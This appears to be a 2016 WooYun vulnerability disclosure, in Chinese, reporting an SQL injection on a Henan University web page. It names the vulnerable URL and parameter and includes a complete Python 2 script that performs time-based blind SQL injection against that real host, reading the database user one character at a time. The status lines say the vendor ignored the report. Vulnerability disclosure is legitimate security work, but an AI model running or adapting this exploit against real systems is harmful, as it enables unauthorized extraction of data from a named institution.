河南大学某站注入

编号193740
Urlhttp://www.wooyun.org/bug.php?action=view&id=193740
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题河南大学某站注入
漏洞类型SQL注射漏洞
厂商河南大学
白帽子Sunshie
提交日期2016-04-08 11:15:00
公开日期2016-04-08 16:41:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签Mysql
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank0
漏洞简介
凑个热闹
漏洞细节

注入点:http://wybjpkc.henu.edu.cn/regform.php?membertypeid=12%20where%201

sql.jpg


db.jpg


测试脚本:

#coding=utf-8 
import sys,urllib2
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
import urllib
import time
result=''
def request(URL):
#print URL
user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
req = urllib2.Request(URL, None, user_agent)

try:
request = urllib2.urlopen(req,timeout=4)

except Exception ,e:
time.sleep(2)
return 'timeout'

return request.read()
def binary_sqli(left, right, index):
global result
while 1:
mid = (left + right)/2
if mid == left:
result += chr(mid)
print result
break
payload = "if(ascii(substring(user(),"+str(index)+",1))<"+str(mid)+",1,sleep(2))"
html = request('http://wybjpkc.henu.edu.cn/regform.php?membertypeid=12%20where%201%20and%20'+payload+'')
verify = 'timeout'
if verify not in html:
right = mid
else:
left = mid

if __name__ == '__main__':
for i in range(1,50):
binary_sqli(32, 127, i)


POC

db.jpg

修复方案

状态信息 2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复已关闭
回应信息危害等级:无影响厂商忽略忽略时间:2016-04-08 16:41